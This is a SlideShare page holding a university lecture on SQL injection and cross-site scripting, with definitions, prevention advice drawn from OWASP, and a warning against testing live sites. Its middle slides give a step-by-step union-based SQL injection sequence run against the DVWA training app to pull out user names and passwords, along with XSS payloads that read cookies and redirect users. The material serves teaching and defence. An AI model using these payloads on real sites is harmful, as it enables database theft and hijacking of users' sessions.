Mike Crabb, profile picture
Uploaded byMike Crabb
PDF, PPTX3,544 views

Sql Injection and XSS

The document discusses SQL injection and cross-site scripting (XSS) vulnerabilities in web applications, emphasizing the risks and methods of exploitation. It explains SQL injection as a technique to manipulate database queries and retrieve sensitive information, while XSS allows attackers to execute scripts in users' browsers. The text concludes with preventive measures and warnings against unauthorized testing on live websites.

Download as PDF, PPTX
webdev@rgu sql injection and XSS
a word of warning Everything that we are going over today, while practical, is meant for penetration testing only! You’ll get in a lot of trouble if you use this on live websites that you don’t own! Also…the fuzz will come after you.
what is sql injection
what is sql injection SQL injection (also known as SQL fishing) is a technique often used to attack data driven applications.
what is sql injection This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in an application's software.
what is sql injection This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker).
what is sql injection The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed.
what is sql injection The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
what is sql injection http://www.bugtracker.com/bugs.php?bugID=007 SELECT * FROM softwareBugs WHERE bugID = $_GET[‘bugID’]
what is sql injection http://www.bugtracker.com/bugs.php?bugID=007 SELECT * FROM softwareBugs WHERE bugID = 007
what is sql injection http://www.bugtracker.com/bugs.php?bugID=007 OR TRUE SELECT * FROM softwareBugs WHERE bugID = 007 OR TRUE can be used to gain access to all bugs
worse example http://www.bugtracker.com/changepassword.php? userID=1234&pass=mynewpass UPDATE Users SET password = ‘pass’ WHERE userID = 1234
worse example http://www.bugtracker.com/changepassword.php? userID=1234 OR TRUE &pass=mynewpass changes all user passwords! UPDATE Users SET password = ‘pass’ WHERE userID = 1234 or TRUE
this is easy though…who would get caught out with an sql injection attack!?
Archos 2014
Wordpress February 2015
Drupal Attack March 2015
in-depth SQL injection attack dvwa
This is DVWA. All of our SQL injection is going to happen using this userID box
1
1 No SQL injection, just putting normal data into the form
%' or '0'='0
%' or '0'='0 All information from a table, ‘Always True’ injection
%' or 0=0 union select null, version() #
%' or 0=0 union select null, version() # Finding out server information
%' or 0=0 union select null, user() #
%' or 0=0 union select null, user() # Finding out the database location
%' or 0=0 union select null, database() #
%' or 0=0 union select null, database() # finding out the name of the database
%' and 1=0 union select null, table_name from information_schema.tables #
%' and 1=0 union select null, table_name from information_schema.tables # Information_Schema part of the database
%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
%' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'# finding tables that mention the word ‘user’ at the start
%' and 1=0 union select null, concat(table_name, 0x0a,column_name) from information_schema.columns where table_name = 'users' #
%' and 1=0 union select null, concat(table_name, 0x0a,column_name) from information_schema.columns where table_name = 'users' # Finding the names of all the fields from the table ‘users’
%' and 1=0 union select null, concat(first_name, 0x0a,last_name,0x0a,user, 0x0a,password) from users #
%' and 1=0 union select null, concat(first_name, 0x0a,last_name,0x0a,user, 0x0a,password) from users # finding all of the information stored in the table users
And this is what we are after! The admin password!
what is Cross site Scripting
What is cross site scripting Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.
What is cross site scripting In Addition, the attacker can send input (e.g., username, password, session ID, etc) which can be later captured by an external script. The victim's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site.
<script>alert("This is a XSS Exploit Test")</script>
<script>alert("This is a XSS Exploit Test")</script> Displays an alert message when a person visits the screen
<iframe src="http:// www.cnn.com"></iframe>
<iframe src="http:// www.cnn.com"></iframe> Creates an iframe that can hold information from another site
<script>alert(document.cookie)</ script>
<script>alert(document.cookie)</ script> Displays an alert message with the users current cookie
<script>window.location=“http:// www.example.com”</script> Auto redirects a user
(I’m sorry)
<script>alert("This is a XSS Exploit Test")</script> <iframe src="http:// www.cnn.com"></iframe> <script>alert(document.cookie)</ script> <script>window.location=“http:// www.example.com”</script> simple test Embed content into the page Get the current cookie used by a user redirect the user to a different page
protecting against sql injection and xss
sql injection Prepared Statements Stored Procedures Escaping all user supplied input Least Privilege White List Validation https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
Never insert untrusted data except in allowed locations HTML Escape before inserting untrusted data into HTML Attribute Escape… Javascript Escape… CSS Escape… URL Escape… In other words…check EVERYTHING! XSS is very common and is really easy to exploit XSS https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
We’re going to do a lot more protection in the lab…don’t worry! is that it!? Going to give you a chance to improve a websites security in terms of SQL injection and XSS vulnerabilities. If you want to try some of these things out yourself… we’re working on it Getting DVWA to work properly on a secure network is difficult, even ours!
webdev@rgu sql injection and XSS

More Related Content

PPTX
SQL INJECTION
byMentorcs
 
PPT
SQL Injection
byAdhoura Academy
 
PPT
Sql injection
byNitish Kumar
 
PPTX
Sql injections - with example
byPrateek Chauhan
 
PPT
Sql injection
byPallavi Biswas
 
PPTX
SQL Joins.pptx
byAnkit Rai
 
PPTX
DoS or DDoS attack
bystollen_fusion
 
PPTX
Trigger
byVForce Infotech
 
SQL INJECTION
byMentorcs
 
SQL Injection
byAdhoura Academy
 
Sql injection
byNitish Kumar
 
Sql injections - with example
byPrateek Chauhan
 
Sql injection
byPallavi Biswas
 
SQL Joins.pptx
byAnkit Rai
 
DoS or DDoS attack
bystollen_fusion
 
Trigger
byVForce Infotech
 

What's hot

PPTX
Ppt on sql injection
byashish20012
 
PDF
Cross site scripting (xss) attacks issues and defense - by sandeep kumbhar
bySandeep Kumbhar
 
PPTX
Cross Site Scripting ( XSS)
byAmit Tyagi
 
PPTX
System hacking
byCAS
 
PPTX
SQL Injections - A Powerpoint Presentation
byRapid Purple
 
PPTX
Sql injection in cybersecurity
bySanad Bhowmik
 
PPT
Sql injection
byNikunj Dhameliya
 
PPTX
DVWA(Damn Vulnerabilities Web Application)
bySoham Kansodaria
 
PDF
Web Application Security and Awareness
byAbdul Rahman Sherzad
 
PPTX
Authentication service security
byPrachi Gulihar
 
PPTX
Information Security- Threats and Attacks presentation by DHEERAJ KATARIA
byDheeraj Kataria
 
PPTX
Secure coding practices
byScott Hurrey
 
PPTX
Client side scripting and server side scripting
bybaabtra.com - No. 1 supplier of quality freshers
 
PPTX
SQL commands
byGirdharRatne
 
PPTX
Triggers
byPooja Dixit
 
PPTX
SQL Queries Information
byNishant Munjal
 
PPTX
Ajax ppt
byOECLIB Odisha Electronics Control Library
 
PPT
Jdbc ppt
byVikas Jagtap
 
PPTX
RPC: Remote procedure call
bySunita Sahu
 
PPTX
SQL(DDL & DML)
bySharad Dubey
 
Ppt on sql injection
byashish20012
 
Cross site scripting (xss) attacks issues and defense - by sandeep kumbhar
bySandeep Kumbhar
 
Cross Site Scripting ( XSS)
byAmit Tyagi
 
System hacking
byCAS
 
SQL Injections - A Powerpoint Presentation
byRapid Purple
 
Sql injection in cybersecurity
bySanad Bhowmik
 
Sql injection
byNikunj Dhameliya
 
DVWA(Damn Vulnerabilities Web Application)
bySoham Kansodaria
 
Web Application Security and Awareness
byAbdul Rahman Sherzad
 
Authentication service security
byPrachi Gulihar
 
Information Security- Threats and Attacks presentation by DHEERAJ KATARIA
byDheeraj Kataria
 
Secure coding practices
byScott Hurrey
 
Client side scripting and server side scripting
bybaabtra.com - No. 1 supplier of quality freshers
 
SQL commands
byGirdharRatne
 
Triggers
byPooja Dixit
 
SQL Queries Information
byNishant Munjal
 
Ajax ppt
byOECLIB Odisha Electronics Control Library
 
Jdbc ppt
byVikas Jagtap
 
RPC: Remote procedure call
bySunita Sahu
 
SQL(DDL & DML)
bySharad Dubey
 

Viewers also liked

PPTX
Hacking & its types
bySai Sakoji
 
PPT
Hacking web applications
byphanleson
 
PPT
TYPES OF HACKING
bySHERALI445
 
PPTX
Hacking ppt
bygiridhar_sadasivuni
 
PDF
Neutralizing SQL Injection in PostgreSQL
byJuliano Atanazio
 
PPTX
Understanding and preventing sql injection attacks
byKevin Kline
 
PDF
Defcon 17-joseph mccray-adv-sql_injection
byAhmed AbdelSatar
 
PDF
XSS And SQL Injection Vulnerabilities
byMindfire Solutions
 
PPTX
ethical hacking in the modern times
byjeshin jose
 
PDF
SQL Injection - The Unknown Story
byImperva
 
PPT
Web application attacks using Sql injection and countermasures
byCade Zvavanjanja
 
PDF
Hacking With Sql Injection Exposed - A Research Thesis
bycorbanmiferreira
 
PDF
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
byGrand Parade Poland
 
PPT
SQL Injection in PHP
byDave Ross
 
PPT
Sql Injection Attacks Siddhesh
bySiddhesh Bhobe
 
PPT
Sql injection attacks
bychaitanya Lotankar
 
PDF
Advanced SQL Injection: Attacks
byNuno Loureiro
 
PPTX
SQL Injection
byMarios Siganos
 
PPT
Blind SQL Injection - Optimization Techniques
byguest54de52
 
PPT
Sql Injection Tutorial!
byralphmigcute
 
Hacking & its types
bySai Sakoji
 
Hacking web applications
byphanleson
 
TYPES OF HACKING
bySHERALI445
 
Hacking ppt
bygiridhar_sadasivuni
 
Neutralizing SQL Injection in PostgreSQL
byJuliano Atanazio
 
Understanding and preventing sql injection attacks
byKevin Kline
 
Defcon 17-joseph mccray-adv-sql_injection
byAhmed AbdelSatar
 
XSS And SQL Injection Vulnerabilities
byMindfire Solutions
 
ethical hacking in the modern times
byjeshin jose
 
SQL Injection - The Unknown Story
byImperva
 
Web application attacks using Sql injection and countermasures
byCade Zvavanjanja
 
Hacking With Sql Injection Exposed - A Research Thesis
bycorbanmiferreira
 
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
byGrand Parade Poland
 
SQL Injection in PHP
byDave Ross
 
Sql Injection Attacks Siddhesh
bySiddhesh Bhobe
 
Sql injection attacks
bychaitanya Lotankar
 
Advanced SQL Injection: Attacks
byNuno Loureiro
 
SQL Injection
byMarios Siganos
 
Blind SQL Injection - Optimization Techniques
byguest54de52
 
Sql Injection Tutorial!
byralphmigcute
 

Similar to Sql Injection and XSS

PPTX
Deep understanding on Cross-Site Scripting and SQL Injection
byVishal Kumar
 
PPTX
Sql injection - security testing
byNapendra Singh
 
PPTX
Owasp Top 10 A1: Injection
byMichael Hendrickx
 
PDF
Think Like a Hacker - Database Attack Vectors
byMark Ginnebaugh
 
PPT
Web security 2010
byAlok Babu
 
PDF
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
byIvan Ortega
 
PPT
PHP - Introduction to Advanced SQL
byVibrant Technologies & Computers
 
PPT
SQL injection and buffer overflows are hacking techniques used to exploit wea...
bybankservicehyd
 
PDF
SQL Injection
byAbhinav Nair
 
PDF
SQL INJECTIONS EVERY TESTER NEEDS TO KNOW
byVladimir Arutin
 
PDF
sql-inj_attack.pdf
byssuser07cf8b
 
PDF
Full MSSQL Injection PWNage
byPrathan Phongthiproek
 
PPTX
Simple web security
by裕夫 傅
 
PPTX
SQL Injection Stegnography in Pen Testing
by191013607gouthamsric
 
PPT
Protecting Your Web Site From SQL Injection & XSS
byskyhawk133
 
PPTX
Greensql2007
byKaustav Sengupta
 
PPTX
Code injection and green sql
byKaustav Sengupta
 
PPTX
SQL Injections - 2016 - Huntington Beach
byJeff Prom
 
PPT
PHP Security Basics
byJohn Coggeshall
 
PDF
Sq linjection
byMahesh Gupta (DBATAG) - SQL Server Consultant
 
Deep understanding on Cross-Site Scripting and SQL Injection
byVishal Kumar
 
Sql injection - security testing
byNapendra Singh
 
Owasp Top 10 A1: Injection
byMichael Hendrickx
 
Think Like a Hacker - Database Attack Vectors
byMark Ginnebaugh
 
Web security 2010
byAlok Babu
 
Web Security - OWASP - SQL injection & Cross Site Scripting XSS
byIvan Ortega
 
PHP - Introduction to Advanced SQL
byVibrant Technologies & Computers
 
SQL injection and buffer overflows are hacking techniques used to exploit wea...
bybankservicehyd
 
SQL Injection
byAbhinav Nair
 
SQL INJECTIONS EVERY TESTER NEEDS TO KNOW
byVladimir Arutin
 
sql-inj_attack.pdf
byssuser07cf8b
 
Full MSSQL Injection PWNage
byPrathan Phongthiproek
 
Simple web security
by裕夫 傅
 
SQL Injection Stegnography in Pen Testing
by191013607gouthamsric
 
Protecting Your Web Site From SQL Injection & XSS
byskyhawk133
 
Greensql2007
byKaustav Sengupta
 
Code injection and green sql
byKaustav Sengupta
 
SQL Injections - 2016 - Huntington Beach
byJeff Prom
 
PHP Security Basics
byJohn Coggeshall
 
Sq linjection
byMahesh Gupta (DBATAG) - SQL Server Consultant
 

More from Mike Crabb

PDF
Forms and Databases in PHP
byMike Crabb
 
PDF
Using mySQL in PHP
byMike Crabb
 
PDF
Analysing Qualitative Data
byMike Crabb
 
PDF
Managing Quality In Qualitative Research
byMike Crabb
 
PDF
The Peer Review Process
byMike Crabb
 
PDF
Doing Focus Groups
byMike Crabb
 
PDF
Doing Interviews
byMike Crabb
 
PDF
Designing Qualitative Research
byMike Crabb
 
PDF
Texture and Glyph Design
byMike Crabb
 
PDF
Pattern Perception and Map Design
byMike Crabb
 
PDF
Ethnographic and Observational Research
byMike Crabb
 
PDF
Conversation Discourse and Document Analysis
byMike Crabb
 
PDF
Dealing with Enterprise Level Data
byMike Crabb
 
PDF
Teaching Cloud to the Programmers of Tomorrow
byMike Crabb
 
PDF
Using Cloud in an Enterprise Environment
byMike Crabb
 
PDF
Accessible and Assistive Interfaces
byMike Crabb
 
PDF
Accessible Everyone
byMike Crabb
 
PDF
Hard to Reach Users in Easy to Reach Places
byMike Crabb
 
PDF
Accessible Everyone
byMike Crabb
 
PDF
Introduction to Accessible Design
byMike Crabb
 
Forms and Databases in PHP
byMike Crabb
 
Using mySQL in PHP
byMike Crabb
 
Analysing Qualitative Data
byMike Crabb
 
Managing Quality In Qualitative Research
byMike Crabb
 
The Peer Review Process
byMike Crabb
 
Doing Focus Groups
byMike Crabb
 
Doing Interviews
byMike Crabb
 
Designing Qualitative Research
byMike Crabb
 
Texture and Glyph Design
byMike Crabb
 
Pattern Perception and Map Design
byMike Crabb
 
Ethnographic and Observational Research
byMike Crabb
 
Conversation Discourse and Document Analysis
byMike Crabb
 
Dealing with Enterprise Level Data
byMike Crabb
 
Teaching Cloud to the Programmers of Tomorrow
byMike Crabb
 
Using Cloud in an Enterprise Environment
byMike Crabb
 
Accessible and Assistive Interfaces
byMike Crabb
 
Accessible Everyone
byMike Crabb
 
Hard to Reach Users in Easy to Reach Places
byMike Crabb
 
Accessible Everyone
byMike Crabb
 
Introduction to Accessible Design
byMike Crabb
 

Recently uploaded

PDF
Implementing Zero Trust: Best Practices for Microsoft Cloud Environments
byMichael Noel
 
PPTX
A ppt on the detection of fake emails and images.
bynotofficialuse365
 
PDF
Recipes: It's About Time - SWO DrupalCamp 2025
byMartin Anderson-Clutz
 
PDF
Introducing Today’s Technologies Overview
byHassan Qamar
 
PDF
Build Smarter Communication Workflows via Unofficial WhatsApp API.pdf
byQuick Message
 
PDF
Connecting the World Seamlessly with International SMS
byG Tech Web Marketing
 
PPTX
原版复刻荷兰格罗宁根大学毕业证(UG毕业证书)成绩单文凭在读证明可查学历认证
by美国毕业证办理文凭北亚利桑那大学学历认证【Q微号:1954 292 140】NAU毕业证成绩单
 
PDF
BrightonSEO Oct 2025 - How Migrations Have Changed - Nick Samuel
byNick Samuel
 
PPTX
Augmented Reality Template-ppt.pptx for free
byCelineVarghese
 
DOCX
BAG TECHNIQUE PROCEDURE FORMAT -EVALUATION II.docx
byDr.Anjalatchi Muthukumaran
 
PDF
Induction Training Module for CHO at AB-HWC(English).pdf
byDr.Anjalatchi Muthukumaran
 
PDF
Reality Drift: Cultural and Academic Footprints Across Media, Classrooms, and...
byDr. Samuel Wellington
 
PDF
Communicable Disease Screening Form from ministry of health pdf
byDr.Anjalatchi Muthukumaran
 
PPT
Parietal lobe anatomy of parietal lobe of brain mostly focussing on radiologi...
bytajix52892
 
PDF
Labuan4D situs Exclusive Game S 1 0 t & T O 9 E 1
byLabuan 4D
 
PDF
How-to-Plan-a-Reliable-Wireless-Network-Installation-in-Dubai-for-Your-Office
byInstallations Experts - UAE
 
PPTX
Week 7.1 - Software Defined Network - SDN.pptx
byOmar Fernandez
 
PDF
Unit 1 Introduction To Computer Networks.pdf
byaida818570
 
PDF
Tamagui: Bridging Web and Mobile Development
byEugene Zharkov
 
PDF
New-Genetec-SC-OTC-001-5.13-Certificate.pdf
byMatheusPaulista1
 
Implementing Zero Trust: Best Practices for Microsoft Cloud Environments
byMichael Noel
 
A ppt on the detection of fake emails and images.
bynotofficialuse365
 
Recipes: It's About Time - SWO DrupalCamp 2025
byMartin Anderson-Clutz
 
Introducing Today’s Technologies Overview
byHassan Qamar
 
Build Smarter Communication Workflows via Unofficial WhatsApp API.pdf
byQuick Message
 
Connecting the World Seamlessly with International SMS
byG Tech Web Marketing
 
原版复刻荷兰格罗宁根大学毕业证(UG毕业证书)成绩单文凭在读证明可查学历认证
by美国毕业证办理文凭北亚利桑那大学学历认证【Q微号:1954 292 140】NAU毕业证成绩单
 
BrightonSEO Oct 2025 - How Migrations Have Changed - Nick Samuel
byNick Samuel
 
Augmented Reality Template-ppt.pptx for free
byCelineVarghese
 
BAG TECHNIQUE PROCEDURE FORMAT -EVALUATION II.docx
byDr.Anjalatchi Muthukumaran
 
Induction Training Module for CHO at AB-HWC(English).pdf
byDr.Anjalatchi Muthukumaran
 
Reality Drift: Cultural and Academic Footprints Across Media, Classrooms, and...
byDr. Samuel Wellington
 
Communicable Disease Screening Form from ministry of health pdf
byDr.Anjalatchi Muthukumaran
 
Parietal lobe anatomy of parietal lobe of brain mostly focussing on radiologi...
bytajix52892
 
Labuan4D situs Exclusive Game S 1 0 t & T O 9 E 1
byLabuan 4D
 
How-to-Plan-a-Reliable-Wireless-Network-Installation-in-Dubai-for-Your-Office
byInstallations Experts - UAE
 
Week 7.1 - Software Defined Network - SDN.pptx
byOmar Fernandez
 
Unit 1 Introduction To Computer Networks.pdf
byaida818570
 
Tamagui: Bridging Web and Mobile Development
byEugene Zharkov
 
New-Genetec-SC-OTC-001-5.13-Certificate.pdf
byMatheusPaulista1
 
In this document
Powered by AI

Overview of SQL Injection and XSS attacks, emphasizing penetration testing and legal consequences.

Definition of SQL Injection, its mechanism, and the vulnerabilities it exploits in SQL databases.

Practical SQL Injection examples illustrating how attackers can manipulate SQL queries to gain unauthorized access.

Mention of notable SQL Injection attacks on Archos, WordPress, and Drupal in 2014-2015.

Detailed SQL Injection techniques using DVWA, demonstrating various SQL queries to extract sensitive data.

Definition and explanation of Cross-Site Scripting, outlining how it allows attackers to inject malicious scripts.

Demonstrations of XSS exploits in web applications, showcasing how scripts can manipulate and access user data.

Strategies for mitigating SQL Injection and XSS attacks, including preparing statements and data validation.

Sql Injection and XSS

  • 1.
  • 2.
    a word ofwarning Everything that we are going over today, while practical, is meant for penetration testing only! You’ll get in a lot of trouble if you use this on live websites that you don’t own! Also…the fuzz will come after you.
  • 3.
  • 4.
    what is sqlinjection SQL injection (also known as SQL fishing) is a technique often used to attack data driven applications.
  • 5.
    what is sqlinjection This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in an application's software.
  • 6.
    what is sqlinjection This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker).
  • 7.
    what is sqlinjection The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed.
  • 8.
    what is sqlinjection The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
  • 9.
    what is sqlinjection http://www.bugtracker.com/bugs.php?bugID=007 SELECT * FROM softwareBugs WHERE bugID = $_GET[‘bugID’]
  • 10.
    what is sqlinjection http://www.bugtracker.com/bugs.php?bugID=007 SELECT * FROM softwareBugs WHERE bugID = 007
  • 11.
    what is sqlinjection http://www.bugtracker.com/bugs.php?bugID=007 OR TRUE SELECT * FROM softwareBugs WHERE bugID = 007 OR TRUE can be used to gain access to all bugs
  • 12.
  • 13.
    worse example http://www.bugtracker.com/changepassword.php? userID=1234 ORTRUE &pass=mynewpass changes all user passwords! UPDATE Users SET password = ‘pass’ WHERE userID = 1234 or TRUE
  • 14.
    this is easythough…who would get caught out with an sql injection attack!?
  • 15.
  • 16.
  • 17.
  • 18.
  • 19.
    This is DVWA. Allof our SQL injection is going to happen using this userID box
  • 21.
  • 22.
    1 No SQL injection,just putting normal data into the form
  • 23.
  • 24.
    %' or '0'='0 Allinformation from a table, ‘Always True’ injection
  • 25.
    %' or 0=0union select null, version() #
  • 26.
    %' or 0=0union select null, version() # Finding out server information
  • 27.
    %' or 0=0union select null, user() #
  • 28.
    %' or 0=0union select null, user() # Finding out the database location
  • 29.
    %' or 0=0union select null, database() #
  • 30.
    %' or 0=0union select null, database() # finding out the name of the database
  • 31.
    %' and 1=0union select null, table_name from information_schema.tables #
  • 32.
    %' and 1=0union select null, table_name from information_schema.tables # Information_Schema part of the database
  • 33.
    %' and 1=0union select null, table_name from information_schema.tables where table_name like 'user%'#
  • 34.
    %' and 1=0union select null, table_name from information_schema.tables where table_name like 'user%'# finding tables that mention the word ‘user’ at the start
  • 35.
    %' and 1=0union select null, concat(table_name, 0x0a,column_name) from information_schema.columns where table_name = 'users' #
  • 36.
    %' and 1=0union select null, concat(table_name, 0x0a,column_name) from information_schema.columns where table_name = 'users' # Finding the names of all the fields from the table ‘users’
  • 37.
    %' and 1=0union select null, concat(first_name, 0x0a,last_name,0x0a,user, 0x0a,password) from users #
  • 38.
    %' and 1=0union select null, concat(first_name, 0x0a,last_name,0x0a,user, 0x0a,password) from users # finding all of the information stored in the table users
  • 39.
    And this iswhat we are after! The admin password!
  • 42.
  • 43.
    What is crosssite scripting Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.
  • 44.
    What is crosssite scripting In Addition, the attacker can send input (e.g., username, password, session ID, etc) which can be later captured by an external script. The victim's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site.
  • 47.
    <script>alert("This is aXSS Exploit Test")</script>
  • 48.
    <script>alert("This is aXSS Exploit Test")</script> Displays an alert message when a person visits the screen
  • 49.
  • 50.
    <iframe src="http:// www.cnn.com"></iframe> Creates aniframe that can hold information from another site
  • 51.
  • 52.
  • 53.
  • 55.
  • 56.
    <script>alert("This is aXSS Exploit Test")</script> <iframe src="http:// www.cnn.com"></iframe> <script>alert(document.cookie)</ script> <script>window.location=“http:// www.example.com”</script> simple test Embed content into the page Get the current cookie used by a user redirect the user to a different page
  • 57.
  • 58.
    sql injection Prepared Statements StoredProcedures Escaping all user supplied input Least Privilege White List Validation https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
  • 59.
    Never insert untrusteddata except in allowed locations HTML Escape before inserting untrusted data into HTML Attribute Escape… Javascript Escape… CSS Escape… URL Escape… In other words…check EVERYTHING! XSS is very common and is really easy to exploit XSS https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
  • 60.
    We’re going todo a lot more protection in the lab…don’t worry! is that it!? Going to give you a chance to improve a websites security in terms of SQL injection and XSS vulnerabilities. If you want to try some of these things out yourself… we’re working on it Getting DVWA to work properly on a secure network is difficult, even ours!
  • 61.